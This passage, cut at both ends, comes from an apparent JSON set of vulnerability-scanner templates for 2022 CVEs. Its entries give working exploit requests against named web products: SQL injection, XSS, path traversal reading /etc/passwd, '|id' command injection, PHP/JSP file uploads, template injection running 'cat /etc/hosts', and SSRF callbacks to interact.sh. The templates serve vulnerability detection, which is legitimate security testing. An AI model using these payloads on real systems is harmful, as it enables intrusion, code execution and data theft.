name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35653","info":{"name":"Moodle LTI module Reflected - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /mod/lti/auth.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nxxx\"><img/src%3d'x'onerror%3dalert('document_domain')>=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src='x'onerror=alert('document_domain')>","moodle-editor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-27043","info":{"name":"Yearning - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd","{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body) || contains_all(body, '[fonts]', 'for 16-bit app support')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-44291","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","len(body_2) == 0","status_code_2 == 302","contains(header_2, \"text/html\")","contains(body_1, \"webTareasSID\")"],"condition":"and"}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-3142","info":{"name":"NEX-Forms Plugin < 7.9.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 30s\nGET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_2 == 200","contains(body_2, \"NEX-Forms\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-0899","info":{"name":"Header Footer Code Manager < 1.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(/document.domain/)</script>\")","contains(body_2, \"All Snippets\")"],"condition":"and"}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/formcraft3/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-24637","info":{"name":"Open Web Analytics 1.7.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nowa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login\n"],"matchers":[{"type":"word","part":"body","words":["Login Failed"],"internal":true}]},{"raw":["GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"serializedobj","internal":true,"regex":["<\\?php\\\\n\\/\\*([A-Za-z0-9=]+)\\*\\/\\\\n\\?>"]}],"matchers":[{"type":"word","part":"body","words":["<?php\\n"],"internal":true}]},{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 